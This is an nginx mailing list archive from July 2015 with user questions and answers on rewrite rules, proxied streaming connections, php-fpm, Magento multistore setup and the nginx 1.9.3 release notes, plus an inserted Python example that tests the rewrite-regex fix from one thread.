In-Reply-To:
References:
Message-ID: <55A37755.6030001@nginx.com>

Hi Subramaniam,

On 7/11/15 8:44 AM, Subramaniam C wrote:
> HI
>
> I have deployed NGINX plus trial version in my setup. I have a
> query that if we use NGINX plus as a load balancer then is there
> any way to fetch the relationship between the virtual servers and
> its attached pool of servers configured in NGINX through REST
> monitoring API's?
>
please forward your requests regarding nginx-plus trials to evaluations at nginx.com.

Thanks,

Maxim Konovalov

--
Maxim Konovalov
http://nginx.com

From ben+nginx at list-subs.com Mon Jul 13 10:17:16 2015
From: ben+nginx at list-subs.com (Ben)
Date: Mon, 13 Jul 2015 11:17:16 +0100
Subject: Query Rewrite Help
Message-ID: <55A3902C.5080205@list-subs.com>

Hi,

Am suffering with a bit of writer's block when it comes to query rewrites.

I've got a rewrite rule that looks like :

rewrite ^/api/app/([^/]+)/([^/]+)/([^/]+)?$ /api/app/$1.php?p=$2&q=$3? last;

I am having two problems :

- I am getting 404 when I try to make a POST call to /api/app/login, I have to use the full suffix, i.e. api/app/login.php instead.

- I want to make the last ([^/]+) optional, but seem to also be getting the same 404 if I forget to include it ?

Ideas most welcome, thanks !

From reallfqq-nginx at yahoo.fr Mon Jul 13 11:04:40 2015
From: reallfqq-nginx at yahoo.fr (B.R.)
Date: Mon, 13 Jul 2015 13:04:40 +0200
Subject: Query Rewrite Help
In-Reply-To: <55A3902C.5080205@list-subs.com>
References: <55A3902C.5080205@list-subs.com>
Message-ID:

Your PCRE is not right. You might interpret it in more 'natural' language as:
/api/app///
The URI /api/app/login does not match it.
You have several ways of addressing that:
- Rewrite your huge, do-it-all PCRE, adding optional, non-capturing groups
- Split the rewriting rule in several versions, each addressing one depth level (eases readability/maintenance/performance?)

I would also suggest you avoid using rewrite and replace it with location/return as much as you could:
https://youtu.be/YWRYbLKsS0I
---
*B. R.*

On Mon, Jul 13, 2015 at 12:17 PM, Ben wrote:

> Hi,
>
> Am suffering with a bit of writer's block when it comes to query rewrites.
>
> I've got a rewrite rule that looks like :
>
> rewrite ^/api/app/([^/]+)/([^/]+)/([^/]+)?$ /api/app/$1.php?p=$2&q=$3?
> last;
>
> I am having two problems :
>
> - I am getting 404 when I try to make a POST call to /api/app/login, I
> have to use the full suffix, i.e. api/app/login.php instead.
>
> - I want to make the last ([^/]+) optional, but seem to also be getting
> the same 404 if I forget to include it ?
>
> Ideas most welcome, thanks !

From ben+nginx at list-subs.com Mon Jul 13 13:38:56 2015
From: ben+nginx at list-subs.com (Ben)
Date: Mon, 13 Jul 2015 14:38:56 +0100
Subject: Query Rewrite Help
In-Reply-To:
References: <55A3902C.5080205@list-subs.com>
Message-ID: <55A3BF70.7000805@list-subs.com>

Thanks !

On 13/07/2015 12:04, B.R. wrote:
> Your PCRE is not right. You might interpret it in more 'natural'
> language as:
> /api/app/// or nothing>
> The URI /api/app/login does not match it.
>
> You have several ways of addressing that:
> - Rewrite your huge, do-it-all PCRE, adding optional, non-capturing groups
> - Split the rewriting rule in several versions, each addressing one
> depth level (eases readability/maintenance/performance?)
>
> I would also suggest you avoid using rewrite and replace it with
> location/return as much as you could:
> https://youtu.be/YWRYbLKsS0I
> ---
> *B. R.*
>
> On Mon, Jul 13, 2015 at 12:17 PM, Ben
> wrote:
>
> Hi,
>
> Am suffering with a bit of writer's block when it comes to query
> rewrites.
>
> I've got a rewrite rule that looks like :
>
> rewrite ^/api/app/([^/]+)/([^/]+)/([^/]+)?$
> /api/app/$1.php?p=$2&q=$3? last;
>
> I am having two problems :
>
> - I am getting 404 when I try to make a POST call to
> /api/app/login, I have to use the full suffix, i.e.
> api/app/login.php instead.
>
> - I want to make the last ([^/]+) optional, but seem to also be
> getting the same 404 if I forget to include it ?
>
> Ideas most welcome, thanks !

From nginx-forum at nginx.us Mon Jul 13 16:02:44 2015
From: nginx-forum at nginx.us (dgobaud)
Date: Mon, 13 Jul 2015 12:02:44 -0400
Subject: Dropped https client connection doesn't drop backend proxy_pass connection
In-Reply-To: <1363321351.3854.140661204587653.70CC51E2@webmail.messagingengine.com>
References: <1363321351.3854.140661204587653.70CC51E2@webmail.messagingengine.com>
Message-ID: <0982748dea8239b15a3fb341057c5c2d.NginxMailingListEnglish@forum.nginx.org>

Any update on this? Seeing this problem with nginx leaving connections open on AWS Beanstalk using nginx to proxy to puma/ruby on rails.
nginx version: nginx/1.6.2 NAME="Amazon Linux AMI" VERSION="2015.03" ID="amzn" ID_LIKE="rhel fedora" VERSION_ID="2015.03" PRETTY_NAME="Amazon Linux AMI 2015.03" ANSI_COLOR="0;33" CPE_NAME="cpe:/o:amazon:linux:2015.03:ga" HOME_URL="http://aws.amazon.com/amazon-linux-ami/" Amazon Linux AMI release 2015.03 Linux ip-172-31-12-138 3.14.42-31.38.amzn1.x86_64 #1 SMP Wed May 13 20:33:05 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Posted at Nginx Forum: http://forum.nginx.org/read.php?2,237386,260255#msg-260255 From nginx-forum at nginx.us Mon Jul 13 17:40:32 2015 From: nginx-forum at nginx.us (dgobaud) Date: Mon, 13 Jul 2015 13:40:32 -0400 Subject: keepalive_timeout, proxy_send_timeout, and proxy_read_timeout ignored Message-ID: Hi, I'm using AWS Beanstalk with nginx in front of a Puma server serving Ruby on Rails. I have one URL that is for an EventSource so it is kept alive and data is streamed out. I was running into this problem http://forum.nginx.org/read.php?2,237386,237386 where when the client closes the browser but nginx keeps the connection alive forever so I tried having nginx automatically close the connection after 5 seconds. I set keepalive_timeout, proxy_send_timeout, and proxy_read_timeout all to 5 seconds but all were ignored. The connection remained open until nginx was restarted. 
# nginx config

upstream my_app {
    server unix:///var/run/puma/my_app.sock;
}

server {
    listen 80;
    server_name _ localhost; # need to listen to localhost for worker tier

    if ($http_x_forwarded_proto = "http") { return 301 https://$host$request_uri; }

    location /dashboard_stream {
        proxy_pass http://my_app; # match the name of upstream directive which is defined above
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_buffering off;
        proxy_cache off;
        proxy_http_version 1.1;
        proxy_set_header Connection '';
        chunked_transfer_encoding off;
        keepalive_timeout 5s;
        proxy_send_timeout 5s;
        proxy_read_timeout 5s;
    }
}

# nginx version
nginx version: nginx/1.6.2

# AWS linux version
NAME="Amazon Linux AMI"
VERSION="2015.03"
ID="amzn"
ID_LIKE="rhel fedora"
VERSION_ID="2015.03"
PRETTY_NAME="Amazon Linux AMI 2015.03"
ANSI_COLOR="0;33"
CPE_NAME="cpe:/o:amazon:linux:2015.03:ga"
HOME_URL="http://aws.amazon.com/amazon-linux-ami/"
Amazon Linux AMI release 2015.03

# kernel version
Linux ip-172-31-12-138 3.14.42-31.38.amzn1.x86_64 #1 SMP Wed May 13 20:33:05 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260257,260257#msg-260257

From nginx-forum at nginx.us Mon Jul 13 19:14:58 2015
From: nginx-forum at nginx.us (adjc98)
Date: Mon, 13 Jul 2015 15:14:58 -0400
Subject: New to nginx question about php-fpm
Message-ID: <9da828a60431717c96f26bbbc31983f4.NginxMailingListEnglish@forum.nginx.org>

I am new to nginx and had a question about php-fpm. It seems that php-fpm is being restarted at random times. I am not sure what is causing the restart, but when it does I am getting this in the php-fpm.log

[12-Jul-2015 00:52:29] ERROR: An another FPM instance seems to already listen on /opt/pifpm/fpmsockets/5.5.11.sock
[12-Jul-2015 00:52:29] ERROR: FPM initialization failed

I am assuming that the error is happening because the FPM processes are not being shut down correctly?
I am not sure how to find what is calling the FPM restart. Do you have any suggestions on how to find the initial restart call and how I can make it restart smoothly?

The server is a centos server with cpanel. I have not been able to locate the php-fpm.conf or the nginx.conf on my server. I know you need more info than this, so please point me in the right direction.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260260,260260#msg-260260

From nginx-forum at nginx.us Mon Jul 13 19:17:07 2015
From: nginx-forum at nginx.us (adjc98)
Date: Mon, 13 Jul 2015 15:17:07 -0400
Subject: New to nginx question about php-fpm
In-Reply-To: <9da828a60431717c96f26bbbc31983f4.NginxMailingListEnglish@forum.nginx.org>
References: <9da828a60431717c96f26bbbc31983f4.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <88f9ded9435ec468381b8e8b14d45a94.NginxMailingListEnglish@forum.nginx.org>

Found nginx conf:

server {
    listen 184.154.39.58:80 default_server;
    server_name _;
    access_log off;

    location / {
        proxy_send_timeout 90;
        proxy_read_timeout 90;
        proxy_buffer_size 4k;
        proxy_buffers 16 32k;
        proxy_busy_buffers_size 64k;
        proxy_temp_file_write_size 64k;
        proxy_connect_timeout 30s;
        proxy_redirect http://184.154.39.58:9999 http://CPANELIP;
        proxy_pass http://184.154.39.58:9999;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260260,260261#msg-260261

From nginx-forum at nginx.us Mon Jul 13 22:03:52 2015
From: nginx-forum at nginx.us (J_12)
Date: Mon, 13 Jul 2015 18:03:52 -0400
Subject: Nginx Magento multistore configuration
Message-ID:

There is a website that has multiple subcategories which are stores in magento:

www.website.com/sub1 www.website.com/sub2 www.website.com/sub3

The server used is nginx. everything is set up. And used to work, the nginx conf file for this site needs to be reconstructed.

at the moment when for example www.website.com/sub1 is requested this will set the store to sub1. which works fine. However when a product is asked i.e. www.website.com/sub1/product this returned a "page not found" error.

If the store is set to sub1 the url www.website.com/product DOES FIND the product without any issues. on the other hand if the store was not set previously, www.website.com/product DID NOT FIND the product.

it seemed that once a store is set the following happens e.g. www.website.com/sub1/product :

sub1->sub1->product == error (because of sub1->sub1)

this should be:

sub1->product.

note that setting the store when www.website.com/sub1/product is requested and then redirecting the site to www.website.com/product is not an option. everything used to work fine! The store setup had not been changed. only the nginx conf file should be adjusted. any suggestions?

to be more specific: in the root folder there is an index.php file where magento is set to run the website via mage run code. In the root folder there are subfolders one for each store. these folders each contain an index.php file where the store is set. any more info needed?

Any help would be appreciated.

additional info: in the root folder there is an index.php file where magento is set to run the website via mage run code. In the root folder there are subfolders: one for each store. These folders each contain an index.php file where the store is set( again via mage run code) (the stores are being set correctly in these files).

the nginx conf looked like this:

server {

    listen 80 default;
    server_name website.com;
    root /www_folder;
    client_max_body_size 10M;

    location / {
        index index.php;
        try_files $uri $uri/ @handler;
        expires 30d;
    }

    location /mage/ {
        try_files $uri $uri/ @magehandler;
        expires 30d;
    }

    location @handler {
        ## Remove trailing slash
        rewrite ^/(.*)/$ /$1 permanent;
        ## Magento uses a common front handler
        rewrite / /index.php;
    }

    location @magehandler {
        ## Adds a trailing slash to any urls that is missing a trailing slash
        rewrite ^(.*[^/])$ $1/ permanent;
        ## Magento uses a common front handler
        rewrite /mage/ /mage/index.php;
    }

    ## These locations would be hidden by .htaccess normally, protected
    location ~ (/mage/(app/|includes/|lib/|pkginfo/|var/|errors/local.xml|shell/|tmp/|cron.+)|/\.git/|/\.ht.+) {deny all;}

    location ~* \.(js|css|png|jpg|jpeg|gif|ico)$ {
        expires max;
        log_not_found off;
    }

    location /. { ## Disable .htaccess and other hidden files
        return 404;
    }

    location ~ .php/ {
        rewrite ^(.*.php)/ $1 last;
    }

    location ~ \.php$ {
        add_header X-UA-Compatible 'IE=Edge,chrome=1';
        try_files $uri =404;
        expires off;
        fastcgi_index index.php;
        fastcgi_pass unix:/var/run/php5-fpm.sock;
        #fastcgi_pass 127.0.0.1:9000;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include /etc/nginx/fastcgi_params;
        fastcgi_param SERVER_PORT 80;
        fastcgi_param HTTPS $fastcgi_https;
    }
}

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260265,260265#msg-260265

From steve at greengecko.co.nz Mon Jul 13 23:23:03 2015
From: steve at greengecko.co.nz (steve)
Date: Tue, 14 Jul 2015 11:23:03 +1200
Subject: Nginx Magento multistore configuration
In-Reply-To:
References:
Message-ID: <55A44857.2000808@greengecko.co.nz>

I have a feeling that you may be taking the wrong approach... there is no need to use these subfolders for each storefront any more. Each separate storefront has a unique type / code pair, which needs to be passed to Magento to identify the site you're using.
I find the simplest way to set it up is to map a couple of variables:

Here's a completely untested example which should ensure that the right storefront is used... nothing else necessary

map $request_uri $mage_type {
    default store;
    ~^/site1 website;
    ~^/site2 website;
}

map $request_uri $mage_code {
    default default;
    ~^/site1 site1;
    ~^/site2 site2;
}

And then your php block would be...

location ~ \.php$ {
    add_header X-UA-Compatible 'IE=Edge,chrome=1';
    try_files $uri =404;
    expires off;
    fastcgi_index index.php;
    fastcgi_pass unix:/var/run/php5-fpm.sock;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include /etc/nginx/fastcgi_params;
    fastcgi_param SERVER_PORT 80;
    fastcgi_param HTTPS $fastcgi_https;
    fastcgi_param MAGE_RUN_CODE $mage_code;
    fastcgi_param MAGE_RUN_TYPE $mage_type;
}

On 14/07/15 10:03, J_12 wrote:
> There is a website that has multiple subcatogories which are stores in
> magento:
>
> www.website.com/sub1 www.website.com/sub2 www.website.com/sub3
>
> The server used is ngnix. everything is set up. And used to work, the nginx
> conf file for this site need to be reconstructed.
>
> at the moment when for example www.website.com/sub1 is requested this wil
> set the store to store to sub1. which works fine. However when a product is
> asked i.e. www.website.com/sub1/product this returned a "page not found"
> error.
>
> If the store is set to sub1 the url www.website.com/product DOES FIND the
> product without any issues. on the other hand f the store was not set
> previously, www.website.com/product DID NOT FIND the product.
>
> it seemed that once a store is set the following happens e.g.
> www.website.com/sub1/product :
>
> sub1->sub1->product == error (because of sub1->sub1)
>
> this should be:
>
> sub1->product.
>
> note that setting the store when www.website.com/sub1/product is requested
> and then redirecting the site to www.website.com/product is not an option.
> everything used to work fine! The store setup had not been changed.
only the > the nginx conf file should be adjusted. any sugestions? > > to be more specific: in the root folder there is an index.php file were > magento is set to run the website via mage run code. In the root folder > there are subfolders one for each store. these folders each contain an > index.php file were the store is set. any more info needed? > > Any help would be appreciated. > > additional info: in the root folder there is an index.php file were magento > is set to run the website via mage run code. In the root folder there are > subfolders: one for each store. These folders each contain an index.php file > were the store is set( again via mage run code) (the stores are being set > correctly in these files). > > the nginx conf looked like this: > > > > > server { > > listen 80 default; > server_name website.com; > root /www_folder; > client_max_body_size 10M; > > location / { > index index.php; > try_files $uri $uri/ @handler; > expires 30d; > } > > > location /mage/ { > try_files $uri $uri/ @magehandler; > expires 30d; > } > > location @handler { > ## Remove trailing slash > rewrite ^/(.*)/$ /$1 permanent; > ## Magento uses a common front handler > rewrite / /index.php; > } > > location @magehandler { > ## Adds a trailing slash to any urls that is missing a trailing slash > rewrite ^(.*[^/])$ $1/ permanent; > ## Magento uses a common front handler > rewrite /mage/ /mage/index.php; > } > > > ## These locations would be hidden by .htaccess normally, protected > location ~ > (/mage/(app/|includes/|lib/|pkginfo/|var/|errors/local.xml|shell/|tmp/|cron.+)|/\.git/|/\.ht.+) > {deny all;} > > location ~* \.(js|css|png|jpg|jpeg|gif|ico)$ { > expires max; > log_not_found off; > } > > location /. 
{ ## Disable .htaccess and other hidden files > return 404; > } > > location ~ .php/ { > rewrite ^(.*.php)/ $1 last; > } > > location ~ \.php$ { > add_header X-UA-Compatible 'IE=Edge,chrome=1'; > try_files $uri =404; > expires off; > fastcgi_index index.php; > fastcgi_pass unix:/var/run/php5-fpm.sock; > #fastcgi_pass 127.0.0.1:9000; > fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; > include /etc/nginx/fastcgi_params; > fastcgi_param SERVER_PORT 80; > fastcgi_param HTTPS $fastcgi_https; > } > } > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260265,260265#msg-260265 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Steve Holdoway BSc(Hons) MIITP http://www.greengecko.co.nz Linkedin: http://www.linkedin.com/in/steveholdoway Skype: sholdowa From anoopalias01 at gmail.com Tue Jul 14 00:08:14 2015 From: anoopalias01 at gmail.com (Anoop Alias) Date: Tue, 14 Jul 2015 05:38:14 +0530 Subject: New to nginx question about php-fpm In-Reply-To: <88f9ded9435ec468381b8e8b14d45a94.NginxMailingListEnglish@forum.nginx.org> References: <9da828a60431717c96f26bbbc31983f4.NginxMailingListEnglish@forum.nginx.org> <88f9ded9435ec468381b8e8b14d45a94.NginxMailingListEnglish@forum.nginx.org> Message-ID: Looks like you are using the cpXstack cpanel plugin. Please read https://support.sysally.net/projects/ndeploy/wiki/CpXstack_and_cpHstack_users_read_this -- *Anoop P Alias* -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From vbart at nginx.com Tue Jul 14 13:23:47 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 14 Jul 2015 16:23:47 +0300 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <0982748dea8239b15a3fb341057c5c2d.NginxMailingListEnglish@forum.nginx.org> References: <1363321351.3854.140661204587653.70CC51E2@webmail.messagingengine.com> <0982748dea8239b15a3fb341057c5c2d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <27112609.fgdjELvfcj@vbart-laptop> On Monday 13 July 2015 12:02:44 dgobaud wrote: > Any update on this? Seeing this problem with nginx leaving connections open > on AWS Beanstalk using nginx to proxy to puma/ruby on rails. [..] Do you have cache or proxy store configured? wbr, Valentin V.
Bartenev From shay at peretz.in Tue Jul 14 13:49:46 2015 From: shay at peretz.in (Shay Peretz) Date: Tue, 14 Jul 2015 16:49:46 +0300 Subject: Nginx with Organization PROXY server Message-ID: Hello , on a linux box I define to move the traffic through some Centralize proxy server ( Organization one ) in order to configure the proxy from the command line I ran : export HTTP_PROXY="http://:" On the same box I have nginx which serve as a reverse proxy and all the local application sending the traffic through the local reverse proxy how can I force the nginx to fwd all the traffic through the ORG proxy server ? chart ... Linux Box Proxy server | Internet | |--------------------------------------------| => |---------------------------| => -> < nginx > Organization Proxy | | Thanks ! From nginx-forum at nginx.us Tue Jul 14 15:21:24 2015 From: nginx-forum at nginx.us (elianmarks) Date: Tue, 14 Jul 2015 11:21:24 -0400 Subject: Problem Nginx with SSL Settings active in IIS 7.5 Message-ID: <9db06eff069bab748a9f771ec8c87722.NginxMailingListEnglish@forum.nginx.org> I've got the following problem with nginx working with IIS, when enabled the client certificate in the SSL Settings solicitation IIS, it performs two SSL handshake, a first without requesting the certificate after this first handshake is done another handshake requesting the certificate. The operation is done as explained in this link: http://blogs.technet?ertificate-authentication.aspx When access the application through the nginx reverse is done only one handshake already requesting the certificate, resulting in no operation of the application. 
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260279,260279#msg-260279 From nginx-forum at nginx.us Tue Jul 14 15:22:06 2015 From: nginx-forum at nginx.us (elianmarks) Date: Tue, 14 Jul 2015 11:22:06 -0400 Subject: Problem Nginx with SSL Settings active in IIS 7.5 In-Reply-To: <9db06eff069bab748a9f771ec8c87722.NginxMailingListEnglish@forum.nginx.org> References: <9db06eff069bab748a9f771ec8c87722.NginxMailingListEnglish@forum.nginx.org> Message-ID: <630c8e6507a070dec4428c222d9989e8.NginxMailingListEnglish@forum.nginx.org> The correct link - http://blogs.technet.com/b/nettracer/archive/2013/12/30/how-it-works-on-the-wire-iis-http-client-certificate-authentication.aspx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260279,260280#msg-260280 From nginx-forum at nginx.us Tue Jul 14 15:50:29 2015 From: nginx-forum at nginx.us (dgobaud) Date: Tue, 14 Jul 2015 11:50:29 -0400 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <27112609.fgdjELvfcj@vbart-laptop> References: <27112609.fgdjELvfcj@vbart-laptop> Message-ID: <605cd2fb2b57858f88e1e75ed7deb80f.NginxMailingListEnglish@forum.nginx.org> Don't think so - config is below and the relevant url is /dashboard_stream upstream my_app { server unix:///var/run/puma/my_app.sock; } server { listen 80; server_name _ localhost; # need to listen to localhost for worker tier if ($http_x_forwarded_proto = "http") { return 301 https://$host$request_uri; } location / { proxy_pass http://my_app; # match the name of upstream directive which is defined above proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } location /dashboard_stream { proxy_pass http://my_app; # match the name of upstream directive which is defined above proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_buffering off; proxy_cache off; proxy_http_version 1.1; } } Valentin V. 
Bartenev Wrote: ------------------------------------------------------- > On Monday 13 July 2015 12:02:44 dgobaud wrote: > > Any update on this? Seeing this problem with nginx leaving > connections open > > on AWS Beanstalk using nginx to proxy to puma/ruby on rails. > [..] > > Do you have cache or proxy store configured? > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,237386,260281#msg-260281 From nginx-forum at nginx.us Tue Jul 14 16:43:53 2015 From: nginx-forum at nginx.us (dgobaud) Date: Tue, 14 Jul 2015 12:43:53 -0400 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <605cd2fb2b57858f88e1e75ed7deb80f.NginxMailingListEnglish@forum.nginx.org> References: <27112609.fgdjELvfcj@vbart-laptop> <605cd2fb2b57858f88e1e75ed7deb80f.NginxMailingListEnglish@forum.nginx.org> Message-ID: I also just tested regular http and it is having the same problem. 
dgobaud Wrote: ------------------------------------------------------- > Don't think so - config is below and the relevant url is > /dashboard_stream > > upstream my_app { > server unix:///var/run/puma/my_app.sock; > } > > server { > listen 80; > server_name _ localhost; # need to listen to localhost for > worker tier > > if ($http_x_forwarded_proto = "http") { return 301 > https://$host$request_uri; } > > location / { > proxy_pass http://my_app; # match the name of upstream > directive which is defined above > proxy_set_header Host $host; > proxy_set_header X-Forwarded-For > $proxy_add_x_forwarded_for; > } > > location /dashboard_stream { > proxy_pass http://my_app; # match the name of upstream > directive which is defined above > proxy_set_header Host $host; > proxy_set_header X-Forwarded-For > $proxy_add_x_forwarded_for; > proxy_buffering off; > proxy_cache off; > proxy_http_version 1.1; > } > } > > Valentin V. Bartenev Wrote: > ------------------------------------------------------- > > On Monday 13 July 2015 12:02:44 dgobaud wrote: > > > Any update on this? Seeing this problem with nginx leaving > > connections open > > > on AWS Beanstalk using nginx to proxy to puma/ruby on rails. > > [..] > > > > Do you have cache or proxy store configured? > > > > wbr, Valentin V. Bartenev > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,237386,260283#msg-260283 From mdounin at mdounin.ru Tue Jul 14 17:14:56 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Jul 2015 20:14:56 +0300 Subject: nginx-1.9.3 Message-ID: <20150714171455.GS93501@mdounin.ru> Changes with nginx 1.9.3 14 Jul 2015 *) Change: duplicate "http", "mail", and "stream" blocks are now disallowed. *) Feature: connection limiting in the stream module. *) Feature: data rate limiting in the stream module. 
*) Bugfix: the "zone" directive inside the "upstream" block did not work on Windows. *) Bugfix: compatibility with LibreSSL in the stream module. Thanks to Piotr Sikora. *) Bugfix: in the "--builddir" configure parameter. Thanks to Piotr Sikora. *) Bugfix: the "ssl_stapling_file" directive did not work; the bug had appeared in 1.9.2. Thanks to Faidon Liambotis and Brandon Black. *) Bugfix: a segmentation fault might occur in a worker process if the "ssl_stapling" directive was used; the bug had appeared in 1.9.2. Thanks to Matthew Baldwin. -- Maxim Dounin http://nginx.org/ From kworthington at gmail.com Tue Jul 14 17:34:20 2015 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 14 Jul 2015 13:34:20 -0400 Subject: nginx-1.9.3 In-Reply-To: <20150714171455.GS93501@mdounin.ru> References: <20150714171455.GS93501@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.9.3 for Windows http://goo.gl/qn44F5 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Jul 14, 2015 at 1:14 PM, Maxim Dounin wrote: > Changes with nginx 1.9.3 14 Jul > 2015 > > *) Change: duplicate "http", "mail", and "stream" blocks are now > disallowed. > > *) Feature: connection limiting in the stream module. > > *) Feature: data rate limiting in the stream module. > > *) Bugfix: the "zone" directive inside the "upstream" block did not > work > on Windows. > > *) Bugfix: compatibility with LibreSSL in the stream module. > Thanks to Piotr Sikora. > > *) Bugfix: in the "--builddir" configure parameter. > Thanks to Piotr Sikora. 
> > *) Bugfix: the "ssl_stapling_file" directive did not work; the bug had > appeared in 1.9.2. > Thanks to Faidon Liambotis and Brandon Black. > > *) Bugfix: a segmentation fault might occur in a worker process if the > "ssl_stapling" directive was used; the bug had appeared in 1.9.2. > Thanks to Matthew Baldwin. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Jul 14 17:35:58 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Jul 2015 20:35:58 +0300 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: References: <27112609.fgdjELvfcj@vbart-laptop> <605cd2fb2b57858f88e1e75ed7deb80f.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150714173557.GX93501@mdounin.ru> Hello! On Tue, Jul 14, 2015 at 12:43:53PM -0400, dgobaud wrote: > I also just tested regular http and it is having the same problem. First of all, please clarify what's the problem you are seeing. That is, please provide details/stats/logs that show the problem. -- Maxim Dounin http://nginx.org/ From lists at ruby-forum.com Tue Jul 14 17:37:09 2015 From: lists at ruby-forum.com (Crystal Pellitier) Date: Tue, 14 Jul 2015 19:37:09 +0200 Subject: performance testing In-Reply-To: <270dad5267769b3270203fc7cd4bb348.NginxMailingListEnglish@forum.nginx.org> References: <270dad5267769b3270203fc7cd4bb348.NginxMailingListEnglish@forum.nginx.org> Message-ID: What is performance testing?what is the importance of it?Can a functional tester can do performance testing? -- Posted via http://www.ruby-forum.com/. 
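
Added example (not code from any poster on this list), relating to the "Query Rewrite Help" thread earlier in this archive: it models Ben's rewrite rule with Python's re module to show which paths it rejects, next to a revision built with the optional, non-capturing groups B.R. suggested. The REVISED pattern, the sample paths and the helper names are assumptions made for illustration, and the model assumes nginx expands an unmatched capture to an empty string.

```python
import re

# Ben's rule as posted in the thread. The slash before the third segment is
# mandatory, so a path needs two segments AND that slash to match.
ORIGINAL = r"^/api/app/([^/]+)/([^/]+)/([^/]+)?$"

# Assumed revision (not from the thread): the second and third segments sit
# in nested optional non-capturing groups, so each one brings its own slash.
# The first segment excludes dots so that an already rewritten path such as
# /api/app/login.php is not matched again and turned into login.php.php.
REVISED = r"^/api/app/([^/.]+)(?:/([^/]+)(?:/([^/]+))?)?/?$"


def rewrite(pattern, path):
    """Model `rewrite <pattern> /api/app/$1.php?p=$2&q=$3? last;`.

    Returns the rewritten URI, or None when the rule does not apply.
    `path` is the URI without its query string, which is what nginx
    matches a rewrite regex against.
    """
    match = re.match(pattern, path)
    if match is None:
        return None  # rule skipped; in Ben's report this ended in the 404
    # Unmatched optional groups come back as None; treat them as empty.
    script, p, q = (group or "" for group in match.groups())
    return f"/api/app/{script}.php?p={p}&q={q}"


# Constructed sample paths covering each depth level discussed in the thread.
SAMPLE_PATHS = [
    "/api/app/login",               # one segment: Ben's first problem
    "/api/app/user/42",             # two segments, no trailing slash
    "/api/app/user/42/",            # two segments plus the mandatory slash
    "/api/app/user/42/edit",        # three segments
    "/api/app/user/42/edit/extra",  # too deep for either rule
    "/api/app/login.php",           # already a script path
]


def compare(paths=SAMPLE_PATHS):
    """Map each path to (result with ORIGINAL, result with REVISED)."""
    return {p: (rewrite(ORIGINAL, p), rewrite(REVISED, p)) for p in paths}


if __name__ == "__main__":
    for path, (old, new) in compare().items():
        print(f"{path:30} original={old!s:32} revised={new}")
```

Before using a revised pattern in nginx, check it with the same paths against the server itself, since location matching and any other rewrite rules are outside this model.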
From mdounin at mdounin.ru Tue Jul 14 19:12:35 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Jul 2015 22:12:35 +0300 Subject: Nginx with Organization PROXY server In-Reply-To: References: Message-ID: <20150714191235.GY93501@mdounin.ru> Hello! On Tue, Jul 14, 2015 at 04:49:46PM +0300, Shay Peretz wrote: > Hello , > > on a linux box I define to move the traffic through some Centralize > proxy server ( Organization one ) > in order to configure the proxy from the command line I ran : > export HTTP_PROXY="http://:" > > On the same box I have nginx which serve as a reverse proxy and all > the local application sending the traffic through the local reverse > proxy > > > how can I force the nginx to fwd all the traffic through the ORG proxy server ? You can't. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Tue Jul 14 19:30:11 2015 From: nginx-forum at nginx.us (shay.peretz@capriza.com) Date: Tue, 14 Jul 2015 15:30:11 -0400 Subject: Nginx with Organization PROXY server In-Reply-To: <20150714191235.GY93501@mdounin.ru> References: <20150714191235.GY93501@mdounin.ru> Message-ID: <3ad334445cd816349bd325851b28ccd9.NginxMailingListEnglish@forum.nginx.org> Any plan for supporting it ? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260278,260296#msg-260296 From mdounin at mdounin.ru Tue Jul 14 20:13:22 2015 From: mdounin at 